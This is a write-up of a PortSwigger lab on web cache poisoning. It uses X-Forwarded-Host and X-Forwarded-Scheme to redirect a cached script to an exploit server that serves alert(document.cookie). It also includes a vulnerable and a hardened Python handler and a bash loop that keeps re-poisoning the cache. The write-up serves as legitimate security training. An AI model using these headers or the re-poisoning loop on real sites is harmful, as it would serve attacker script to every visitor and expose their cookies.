PortSwigger Lab: Web cache poisoning with multiple headers
Task
This lab contains a web cache poisoning vulnerability that is only exploitable when you use multiple headers to craft a malicious request. A user visits the home page roughly once a minute. To solve this lab, poison the cache with a response that executes alert(document.cookie) in the visitor's browser.
Attempt
I added the headers below to the request for /resources/js/tracking.js and sent it:
X-Forwarded-Host: example.com
X-Forwarded-Scheme: http
With this, the response redirected to example.com, indicating the cache poisoning vulnerability: both headers are reflected into the redirect, and neither is part of the cache key.
At the exploit server, host a JS file with the same name and path as /resources/js/tracking.js and set the payload:
alert(document.cookie)
Set X-Forwarded-Host: exploit-EXPLOIT_ID.exploit-server.net so that the redirect points at the exploit server. When testing cache poisoning, add a cache buster like /resources/js/tracking.js?cp=dakfejlsjtesojad so it doesn't affect the live website. The value of the parameter should be random so that normal users don't easily hit the poisoned entry.
To solve this lab, after confirming cache poisoning works, you need to cache poison the actual website by removing the cache buster.
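The mechanism behind the lab, modelled as an added example (not code from the lab or from PortSwigger): a redirect handler that builds its target from X-Forwarded-Host and X-Forwarded-Scheme, a cache keyed on path alone, and a hardened handler that takes the host from configuration and only honours a forwarded scheme set by a trusted proxy. Hostnames are constructed placeholders.

```python
CANONICAL_HOST = "lab.example"  # constructed placeholder for the site's real hostname


def vulnerable_handler(path, headers):
    """Models the lab: an http->https upgrade redirect whose scheme check and
    target host both come from client-controllable X-Forwarded-* headers."""
    scheme = headers.get("X-Forwarded-Scheme", "https").lower()
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    if scheme != "https":
        return 302, {"Location": f"https://{host}{path}"}
    return 200, {"Content-Type": "application/javascript"}


def hardened_handler(path, headers, from_trusted_proxy=False):
    """Redirect target is built from configuration, never from request headers.
    A forwarded scheme is honoured only when the request arrived through the
    trusted proxy, which is expected to overwrite any client-supplied value."""
    scheme = "https"
    if from_trusted_proxy:
        scheme = headers.get("X-Forwarded-Proto", "https").lower()
    if scheme != "https":
        return 302, {"Location": f"https://{CANONICAL_HOST}{path}"}
    return 200, {"Content-Type": "application/javascript"}


def serve(cache, handler, path, headers, **kw):
    """A cache keyed on path only: the unkeyed-header condition the lab relies on."""
    if path not in cache:
        cache[path] = handler(path, headers, **kw)
    return cache[path]


def demo(handler, **kw):
    """First a crafted request, then an ordinary visitor; returns what the visitor gets."""
    cache = {}
    js = "/resources/js/tracking.js"
    # constructed: a request carrying the lab's two headers
    crafted = {"Host": CANONICAL_HOST,
               "X-Forwarded-Host": "attacker.example",
               "X-Forwarded-Scheme": "http"}
    serve(cache, handler, js, crafted, **kw)
    # constructed: a normal visitor sending no forwarded headers
    return serve(cache, handler, js, {"Host": CANONICAL_HOST}, **kw)
```

With the vulnerable handler the visitor receives a cached 302 to attacker.example; with the hardened handler the forwarded headers change nothing, so there is nothing to poison.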
Automatic cache re-poisoning
Some people say cache poisoning isn't really critical because it only works for a short amount of time. But automatically re-poisoning the cache is easy as pie, and you don't need to send a huge amount of traffic.
#!/bin/bash
url="https://ID.web-security-academy.net/resources/js/tracking.js"
# Use an array so each header reaches curl as its own argument; quotes embedded in a plain string are passed literally and curl never sees the headers.
headers=(-H 'X-Forwarded-Host: exploit-EXPLOIT_ID.exploit-server.net' -H 'X-Forwarded-Scheme: nothttps')
while true; do
  curl -s "$url" "${headers[@]}" > /dev/null
  sleep 2
done
This simple bash script keeps re-poisoning the cache indefinitely.